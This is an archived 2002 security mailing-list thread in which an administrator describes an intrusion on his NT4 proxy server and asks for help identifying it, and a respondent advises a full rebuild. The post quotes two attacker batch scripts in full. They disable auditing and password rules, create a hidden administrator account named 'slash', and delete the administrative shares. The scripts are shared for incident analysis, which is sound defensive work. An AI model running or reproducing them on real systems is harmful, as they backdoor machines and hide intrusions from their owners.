RE: Proxy server hit... Any ideas?

From: Mike Cain (mikecat_private)
Date: Tue Nov 19 2002 - 13:28:44 PST

  • Next message: Hugo van der Kooij: "Re: Proxy server hit... Any ideas?"

    I was really more looking for suggestions on 'how' the guy got in, and
    if it matched any known exploits. First off, I didn't build the box, and
    it wasn't my responsibility until about 3 weeks ago. Secondly, I do know
    a good bit about hardening a box, so I am in the process of rebuilding
    the Proxy to my specs (No FTP is DEFINITELY one of them since this
    company doesn't use FTP). 
    Thanks for the help though.... such as it was...
    
    Mike Cain
    
    
    -----Original Message-----
    From: Russell Harding [mailto:hardingrat_private] 
    Sent: Tuesday, November 19, 2002 3:04 PM
    To: Mike Cain
    Cc: incidentsat_private
    Subject: Re: Proxy server hit... Any ideas?
    
    Mike,
    
      It seems like you've been gotten one of the many so called 'hackers'
    who
    troll the internet looking for unpatched NT boxen to use as rogue FTP
    (music/warez/movie) servers.
    
      The incidents list sees this sort of post about once a week...
    "I run NT, don't know security and got hit...what did I get?"
    
      I could be just another person to direct you to the same sources the
    list always does (netstat, fport, etc...) But I would like to recommend
    the following:
    
      With an unknown backdoor installed on your system, you really can
    never
    know if you've eradicated the intruder.  It is best to not really worry
    about what is there (keep the 'pirates booty' if you wish :) ) But focus
    on what to do about it.  You need to re-format your drive, start from
    scratch with the machine _off_ the public internet until it is fully
    patched.  Don't always trust windows update to keep you patched... It
    may
    help you to use a third party utility.
    
       Good luck rebuilding your system,
             -Russell
    
    
    On Mon, 18 Nov 2002, Mike Cain wrote:
    
    > Well, I have had my first run-in with a hacker, or was it a virus? I'm
    > not 100% sure.. Guess I should start from the beginning...
    >
    > A days ago, I began to get user complaints on the slowness of the
    > internet. I figured it was mostly them just wanting something to
    > complain about, so I did what all crappy admins do, I ignored it.
    Well,
    > last night the box was rebooted after some software was updated. Today
    > people were complaining about how PAINFULLY slow the internet was, so
    I
    > looked at the proxy server. NT4 running proxy3. I know, there is newer
    > better stuff, but its what I have to work with. :) SO... I looked at
    the
    > processes and noticed the CPU hovering at 35-50%.. Way too high. So a
    > quick look at the process list showed two things that I didn't
    remember
    > needing to be there, win.exe and start.exe. Next move was to find
    them,
    > and they were in the winnt\system\ folder. What I also found odd was
    > that there were three new folders in that directory all created on the
    > 8th, NT, tools, and win.
    >
    > Here are the contents, respectively.
    > 1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
    > backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll,
    1ygwin1.dll
    > (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
    >
    > 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    > srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    > Routine), and _zoLibr.dll
    >
    > 3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
    > x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
    > win.exe, x32.dll.bkup
    >
    > SO, anyone know what I have or what hit me? From looking at the
    sercure
    > and secure1 batch files, it looks like a root kit... But I'mm new at
    > this side of security I'mm aCiscoo guy...)
    >
    > Last thing, the logs show that the attacker was hitting the
    > \scripts\sample\ folder... Meaning I think he was trying to use the
    old
    > IIS Sample Scripts to execute local code... Not sure if he was
    > successful...
    >
    > Thanks in advance!!
    >
    > Mike Cain
    > CCNP/MCSE
    >
    >
    > Secure.bat =
    > @echo off
    > del temp
    > echo Compiling New Security Policy ...
    > echo [Version] >> temp
    > echo signature="$CHICAGO$" >> temp
    > echo Revision=1 >> temp
    > echo [Profile Description] >> temp
    > echo Description=Default Security Settings. (Windows 2000
    Professional)
    > >> temp
    > echo [System Access] >> temp
    > echo MinimumPasswordAge = 0 >> temp
    > echo MaximumPasswordAge = 42 >> temp
    > echo MinimumPasswordLength = 0 >> temp
    > echo PasswordComplexity = 0 >> temp
    > echo PasswordHistorySize = 0 >> temp
    > echo LockoutBadCount = 0 >> temp
    > echo RequireLogonToChangePassword = 0 >> temp
    > echo ClearTextPassword = 0 >> temp
    > echo [Event Audit] >> temp
    > echo AuditSystemEvents = 0 >> temp
    > echo AuditLogonEvents = 0 >> temp
    > echo AuditObjectAccess = 0 >> temp
    > echo AuditPrivilegeUse = 0 >> temp
    > echo AuditPolicyChange = 0 >> temp
    > echo AuditAccountManage = 0 >> temp
    > echo AuditProcessTracking = 0 >> temp
    > echo AuditDSAccess = 0 >> temp
    > echo AuditAccountLogon = 0 >> temp
    > echo [Registry Values] >> temp
    > echo
    >
    machine\system\currentcontrolset\services\netlogon\parameters\signsecure
    > channel=4,1 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\netlogon\parameters\sealsecure
    > channel=4,1 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\netlogon\parameters\requirestr
    > ongkey=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\netlogon\parameters\requiresig
    > norseal=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\netlogon\parameters\disablepas
    > swordchange=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\r
    > equiresecuritysignature=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
    > nablesecuritysignature=4,1 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
    > nableplaintextpassword=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanserver\parameters\requir
    > esecuritysignature=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanserver\parameters\enable
    > securitysignature=4,0 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanserver\parameters\enable
    > forcedlogoff=4,1 >> temp
    > echo
    >
    machine\system\currentcontrolset\services\lanmanserver\parameters\autodi
    > sconnect=4,15 >> temp
    > echo machine\system\currentcontrolset\control\session
    > manager\protectionmode=4,1 >> temp
    > echo machine\system\currentcontrolset\control\session manager\memory
    > management\clearpagefileatshutdown=4,0 >> temp
    > echo machine\system\currentcontrolset\control\print\providers\lanman
    > print services\servers\addprinterdrivers=4,0 >> temp
    > echo
    machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
    > >> temp
    > echo
    > machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
    >>
    > temp
    > echo
    > machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
    > >> temp
    > echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
    > >> temp
    > echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
    > >> temp
    > echo
    >
    machine\software\microsoft\windows\currentversion\policies\system\shutdo
    > wnwithoutlogon=4,1 >> temp
    > echo
    >
    machine\software\microsoft\windows\currentversion\policies\system\legaln
    > oticetext=1, >> temp
    > echo
    >
    machine\software\microsoft\windows\currentversion\policies\system\legaln
    > oticecaption=1, >> temp
    > echo
    >
    machine\software\microsoft\windows\currentversion\policies\system\dontdi
    > splaylastusername=4,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\scremoveoption=1,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\allocatedasd=1,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
    > echo machine\software\microsoft\windows
    > nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
    > echo [Privilege Rights] >> temp
    > echo seassignprimarytokenprivilege = >> temp
    > echo seauditprivilege = >> temp
    > echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    > echo sebatchlogonright = >> temp
    > echo sechangenotifyprivilege =
    > *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >>
    temp
    > echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
    > echo secreatepermanentprivilege = >> temp
    > echo secreatetokenprivilege = >> temp
    > echo sedebugprivilege = *S-1-5-32-544 >> temp
    > echo sedenybatchlogonright = >> temp
    > echo sedenyinteractivelogonright = >> temp
    > echo sedenynetworklogonright = >> temp
    > echo sedenyservicelogonright = >> temp
    > echo seenabledelegationprivilege = >> temp
    > echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
    > echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
    > echo seinteractivelogonright =
    >
    *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040
    > 8961-1637723038-1801674531-501 >> temp
    > echo seloaddriverprivilege = *S-1-5-32-544 >> temp
    > echo selockmemoryprivilege = >> temp
    > echo semachineaccountprivilege = >> temp
    > echo senetworklogonright = %1 >> temp
    > echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >>
    > temp
    > echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
    > echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    > echo sesecurityprivilege = *S-1-5-32-544 >> temp
    > echo seservicelogonright = >> temp
    > echo seshutdownprivilege =
    > *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
    > echo sesyncagentprivilege = >> temp
    > echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
    > echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
    > echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    > echo setakeownershipprivilege = *S-1-5-32-544 >> temp
    > echo setcbprivilege = >> temp
    > echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >>
    > temp
    > echo Adding User %1 with the Password %2 ...
    > net user /add slash 971985
    > echo Adding slash to the Local Administrator Group ...
    > net localgroup administrators slash /add
    > echo Loading New Security Policy ...
    > secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb
    > /CFG temp
    > echo System is now secure.
    >
    >
    >
    > Secure1.bat
    >
    > net share /delete C$ /y > net.deld
    > net share /delete D$ /y >> net.deld
    > net share /delete E$ /y >> net.deld
    > net share /delete F$ /y >> net.deld
    > net share /delete G$ /y >> net.deld
    > net share /delete H$ /y >> net.deld
    > net share /delete I$ /y >> net.deld
    > net share /delete J$ /y >> net.deld
    > net share /delete K$ /y >> net.deld
    > net share /delete L$ /y >> net.deld
    > net share /delete M$ /y >> net.deld
    > net share /delete N$ /y >> net.deld
    > net share /delete O$ /y >> net.deld
    > net share /delete P$ /y >> net.deld
    > net share /delete Q$ /y >> net.deld
    > net share /delete R$ /y >> net.deld
    > net share /delete S$ /y >> net.deld
    > net share /delete T$ /y >> net.deld
    > net share /delete U$ /y >> net.deld
    > net share /delete V$ /y >> net.deld
    > net share /delete W$ /y >> net.deld
    > net share /delete X$ /y >> net.deld
    > net share /delete Y$ /y >> net.deld
    > net share /delete Z$ /y >> net.deld
    > net share /delete ADMIN$ /y >> net.deld
    > #net share /delete IPC$ /y >> net.deld
    > del net.deld
    >
    >
    >
    >
    ------------------------------------------------------------------------
    ----
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    >
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Nov 20 2002 - 01:58:23 PST